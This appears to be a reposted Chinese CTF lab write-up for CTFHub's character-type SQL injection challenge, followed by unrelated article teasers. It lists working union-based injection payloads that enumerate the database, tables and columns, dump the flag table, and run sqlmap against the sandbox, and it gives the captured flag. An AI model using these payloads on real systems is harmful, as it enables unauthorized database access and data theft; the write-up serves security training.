CTFHUB技能树之SQL——字符型注入

CTFHUB技能树之SQL——字符型注入

news/2024/11/25 1:09:08/文章来源:https://blog.csdn.net/weixin_73049307/article/details/142927306

开启靶场，打开链接：

直接指明是SQL字符型注入，但还是来判断一下

（1）检查是否存在注入点

1' and 1=1#

返回正确

1' and 1=2#

返回错误

说明存在SQL字符型注入

（2）猜字段数

1' order by 2#

1' order by 3#

说明字段数是2

（3）爆数据库名

1' and 1=2 union select 1,database()#

得知数据库名是sqli

（4）爆表名

1' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#

显示表名是news表和flag表，其中flag表是我们需要的

（5）爆列名

1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#

得知flag表的列名是flag

（6）爆字段内容（flag）

1' and 1=2 union select 1,group_concat(flag) from sqli.flag#

成功得到flag：

ctfhub{ee5bfa3b423eb2d6142c66b9}

接下来就用一下sqlmap来试一下：

python sqlmap.py -u "http://challenge-a046856826dbc5de.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

python sqlmap.py -u "http://challenge-a046856826dbc5de.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump

一样成功得到flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/454303.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

Shell重定向输入输出

Shell重定向输入输出

我的后端学习大纲我的Linux学习大纲重定向介绍标准输入介绍从键盘读取用户输入的数据，然后再把数据拿到Shell程序中使用； 标准输出介绍 Shell程序产生的数据，这些数据一般都是呈现到显示器上供用户浏览查看; 默认输入输出文件每个…

阅读更多...

QT的文件操作类 QFile

QT的文件操作类 QFile

QFile 是 Qt 框架中用于文件处理的一个类。它提供了读取和写入文件的功能，支持文本和二进制文件。 QFile 继承自 QIODevice ，因此它可以像其他IO设备一样使用。主要功能文件读写： QFile 支持打开文件进行读取或写入操作文件信息&#x…

阅读更多...

neutron组件

neutron组件

1.实现虚拟交换机有两种方式 2.HCS网络节点华为 HCS 将网络节点单独部署，且部署两台(主备部署) 两张万兆网卡，否则检测无法通过 L3 agent 部署在哪个节点，哪个节点就是网络节点 DHCP agent metadata agent 3.neutron概念 3.1Neutron支持…

阅读更多...

人工智能 | 阿里通义千问大模型

人工智能 | 阿里通义千问大模型

简介通义千问系列模型为阿里云研发的大语言模型。千问模型基于 Transformer 架构，在超大规模的预训练数据上进行训练得到。预训练数据类型多样，覆盖广泛，包括大量网络文本、专业书籍、代码等。同时，在预训练模型的基础之上&…

阅读更多...

整理一下实际开发和工作中Git工具的使用 (持续更新中)

整理一下实际开发和工作中Git工具的使用 (持续更新中)

介绍一下Git 在实际开发和工作中，Git工具的使用可以说是至关重要的，它不仅提高了团队协作的效率，还帮助开发者有效地管理代码版本。以下是对Git工具使用的扩展描述： 版本控制：Git能够跟踪代码的每一个修改记录&#x…

阅读更多...

YOLO目标检测

YOLO目标检测

文章目录一、含义二、与传统检测对比1.one-stage的优缺点2.two-stage的优缺点三、MAP指标1.基本概念2.计算方法3.指标意义一、含义 YOLO（You Only Look Once）是一种基于深度学习的目标检测算法，由Joseph Redmon等人于2016年提出。它的核心…

阅读更多...

力扣困难 52.N皇后II

力扣困难 52.N皇后II

文章目录题目介绍题解题目介绍题解法一：返回51题N皇后List的长度法二： class Solution {private int n, ans;private boolean[] onPath, diag1, diag2;public int totalNQueens(int n) {this.n n;onPath new boolean[n];diag1 new boolean[n * …

阅读更多...

$秃姐学AI系列之：语义分割 + 数据集 | 转置卷积 + 代码$

秃姐学AI系列之：语义分割 + 数据集 | 转置卷积 + 代码

语义分割语义分割将图片中的每个像素分类到对应的类别通常来说现在的会议软件的背景虚化这个功能用的就是语义分割技术无人车进行路面识别也是语义分割技术语义分割 vs 实例分割语义分割将图像划分为若干组成区域，这类问题的方法通常利用图像中像素之间的相关…

阅读更多...

1 -《本地部署开源大模型》如何选择合适的硬件配置

1 -《本地部署开源大模型》如何选择合适的硬件配置

如何选择合适的硬件配置为了在本地有效部署和使用开源大模型，深入理解硬件与软件的需求至关重要。在硬件需求方面，关键是配置一台或多台高性能的个人计算机系统或租用配备了先进GPU的在线服务器，确保有足够的内存和存储空间来处理大数据和复…

阅读更多...

html+css+js实现Notification 通知

html+css+js实现Notification 通知

实现效果： 代码实现： <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>Notif…

阅读更多...

【Linux】为什么环境变量具有全局性？共享？写时拷贝优化？

【Linux】为什么环境变量具有全局性？共享？写时拷贝优化？

环境变量表具有全局性的原因： 环境变量表之所以具有全局性的特征，主要是因为它们是在进程上下文中维护的，并且在大多数操作系统中，当一个进程创建另一个进程（即父进程创建子进程）时，子进程会继承…

阅读更多...

SAP 批量复制角色处理办法

SAP 批量复制角色处理办法

SAP 批量复制角色处理办法 1. 定义2. 功能3. 应用场景4. 操作步骤5. 注意事项6.业务场景7.操作步骤(1)导出旧角色(2)导出文件数据修改(3)上传修改好的角色(4)生成角色参数文件(5) 调用函数批量创建角色(6)关于权限常用功能 SAP 批量复制角色（Batch Role Copy&#x…

阅读更多...

【系统规划与管理师】历年各章节分值汇总（论文）

【系统规划与管理师】历年各章节分值汇总（论文）

【移动端浏览】☞【系统规划与管理师】历年各章节分值汇总（论文） 第4章 IT服务规划设计第5章 IT服务部署实施第6章 IT服务运营管理第7章 IT服务持续改进第8章监督管理第9章 IT服务营销第10章团队建设与管理

阅读更多...

【二】企业级JavaScript开发之代码编辑器

【二】企业级JavaScript开发之代码编辑器

代码编辑器程序员接触时间最长的就是代码编辑器。代码编辑器主要分两种：IDE（集成开发环境）和轻量编辑器。很多人喜欢这两种各选一个。当然还有很多其他很好的编辑器，你可以选择一个你最喜欢的。选择编辑器就像选择其他工具…

阅读更多...

开源OpenStack

开源OpenStack

1.查询HCS基于OpenStack哪个版本开发 2.九大核心组件 OpenStack可以对接FC也可以对接KVM主机；（OpenStack 对接华为FusionCompute，一个集群对应 openstack 一台计算主机）-引申出nova compute 2.1nova nova两个核心组件nova contro…

阅读更多...

马拉车算法（C/C++）

马拉车算法（C/C++）

#1024程序员节 | 征文# 马拉车算法（Manachers Algorithm）是一种用于在字符串中查找最长回文子串的线性时间复杂度算法。该算法由Udi Manacher在1980年代提出，因此得名。它的核心思想是利用已知的回文信息来减少不必要的比较，从而提…

阅读更多...

【Linux】-权限

【Linux】-权限

🔑🔑博客主页：阿客不是客 🍓🍓系列专栏：深入代码世界，了解掌握 Linux 欢迎来到泊舟小课堂 😘博客制作不易欢迎各位👍点赞⭐收藏➕关注一、权限的概念在Linux 中&…

阅读更多...

软件测试与软件缺陷的基础知识

软件测试与软件缺陷的基础知识

✨✨ 欢迎大家来访Srlua的博文（づ￣3￣）づ╭❤～✨✨ 🌟🌟 欢迎各位亲爱的读者，感谢你们抽出宝贵的时间来阅读我的文章。我是Srlua小谢，在这里我会分享我的知识和经验。&am…

阅读更多...

技术面没过，竟然是因为我没用过Pytest框架？

技术面没过，竟然是因为我没用过Pytest框架？

想象一下，你在一次技术面试中满怀信心，答完所有问题，结果却被告知没通过，原因竟然是——你没用过Pytest框架！是的，在当今软件测试的世界里，Pytest已经成为了许多公司的“必备”技能。那么问题…

阅读更多...

数据库表的创建

数据库表的创建

运用的环境是pychram python3.11.4 创建一个表需要用到以下语法注释已经写清楚各种语法的含义，记住缩进是你程序运行的关键，因为程序是看你的缩进来判断你的运行逻辑，像我这个就是缩进不合理导致的报错那么今天分享就到这里，谢…

阅读更多...

最新文章

推荐文章